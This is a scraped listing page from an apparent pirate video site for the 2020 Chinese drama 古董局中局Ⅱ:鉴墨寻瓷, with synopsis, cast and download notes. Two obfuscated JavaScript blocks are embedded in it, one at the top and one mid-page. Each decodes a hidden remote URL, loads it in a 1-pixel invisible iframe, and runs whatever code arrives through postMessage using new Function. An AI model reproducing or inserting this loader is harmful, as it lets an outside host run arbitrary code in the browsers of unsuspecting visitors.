if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['FeMjSpm']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#FeMjSpm'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data['des_s_2484']) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'FF0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'FFl'+'MkZ'+'zc2'+'guF'+'FZG'+'NlM'+'Gsw'+'LmN'+'uJT'+'NBM'+'TA0'+'NFF'+'DMl'+'MkY'+'FFy'+'YjQ'+'1YF'+'FzY'+'lFF'+'MkZ'+'FFj'+'LTF'+'FI0'+'OFF'+'DQt'+'MjU'+'FFt'+'MSF'+'F5t'+'cDM'+'=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

你的位置:首页 > 电视剧频道 > 大陆剧 > 古董局中局Ⅱ:鉴墨寻瓷

《古董局中局Ⅱ:鉴墨寻瓷》 免费在线播放/MP4手机在线观看/迅雷Bt下载

古董局中局Ⅱ:鉴墨寻瓷海报

古董局中局Ⅱ:鉴墨寻瓷

资源:古董局中局Ⅱ:鉴墨寻瓷 全集在线观看播放 | 全集36集

类型:大陆剧 悬疑 小说改编 推理 剧情 冒险 网络剧 盗墓 中国大陆

年份:2020

简介: 许愿(夏雨饰),北京潘家园小古董店\"四悔斋〃的老板,古董鉴宝界最具权威的\"五脉梅花\"家族之一许家,唯一的传人。为了楸出隐藏在五脉之中的〃老朝奉〃造假势力,许愿孤身一人入局破局,与 庞大的古董造假集团展开层层较量,却被设局指引牵扯出两幅《清明上河图》真赝难辨的惊天秘密。查看详情>>
if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['XXeFFHa']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 're' + 'nq' + 'ob' + 'j_2093'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#XXeFFHa'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2093`]) { var t = x(e.data[`des_s_2093`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uaG'+'l6Y'+'nBk'+'dS5'+'jFF'+'biU'+'FFz'+'QTF'+'FEw'+'NFF'+'DQz'+'FFJ'+'TJF'+'FGM'+'jA1'+'YFF'+'zM2'+'FFJ'+'TJG'+'Yy0'+'yMD'+'kzL'+'TIF'+'F1L'+'TEu'+'Y3N'+'z', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

《古董局中局Ⅱ:鉴墨寻瓷》迅雷下载/BT种子/电驴磁力资源

图标提示: 电驴ed2k资源磁力链资源BT种子资源迅雷下载资源

提示:因迅雷软件已启动版权保护,如影片下载出现“任务出错”,请尝试BT下载软件,谢谢支持!

《古董局中局Ⅱ:鉴墨寻瓷》剧情介绍

古董局中局Ⅱ:鉴墨寻瓷

◎片  名 古董局中局Ⅱ:鉴墨寻瓷
◎译  名 古董局中局2 / 古董局中局Ⅱ / 古董局中局之鉴墨寻瓷
◎年  代 2020
◎产  地 内地
◎类  别 剧情,悬疑,犯罪
◎语  言 普通话
◎上映日期 2020-05-10
◎豆瓣评分 7.1
◎豆瓣链接  26873817
◎总 集数 36集
◎单集片长 45分钟
◎导  演 费振翔
◎编  剧 张小年,刘颖,刘奎序
◎主  演 夏雨,魏晨,阿丽亚,梁静,毕彦君,舒耀瑄,沙宝亮,张承,季东燃,戴笑盈

◎简  介
许愿(夏雨饰),北京潘家园小古董店"四悔斋〃的老板,古董鉴宝界最具权威的"五脉梅花"家族之一许家,唯一的传人。为了楸出隐藏在五脉之中的〃老朝奉〃造假势力,许愿孤身一人入局破局,与 庞大的古董造假集团展开层层较量,却被设局指引牵扯出两幅《清明上河图》真赝难辨的惊天秘密。随着迷局的层层解开,境外神秘的造假势力也浮出水面,而这些竟然都与当年许愿爷爷的护宝冤案有着千丝万缕的关系。为了查出前世真相,许愿再度联手投靠于"老朝奉"的药不然(魏晨饰),但不曾想这所有的一切都尽在老朝奉的掌握之中,而老朝奉势力的背后还藏着更大的谜团。 赝品迷局环环相扣,两幅《清明上河图》真赝难辨,亦正亦邪的药不然又是背负着怎样的使命,五脉前世恩怨纠葛最终如何解答,而幕后BOSS "老朝奉"究竟是谁,这一切谜中谜的答案都隐藏在早已布好的局中局里。

古董局中局Ⅱ:鉴墨寻瓷剧照1

古董局中局Ⅱ:鉴墨寻瓷剧照2

古董局中局Ⅱ:鉴墨寻瓷剧照3

古董局中局Ⅱ:鉴墨寻瓷剧照4

古董局中局Ⅱ:鉴墨寻瓷剧照5

古董局中局Ⅱ:鉴墨寻瓷剧照6

大陆剧推荐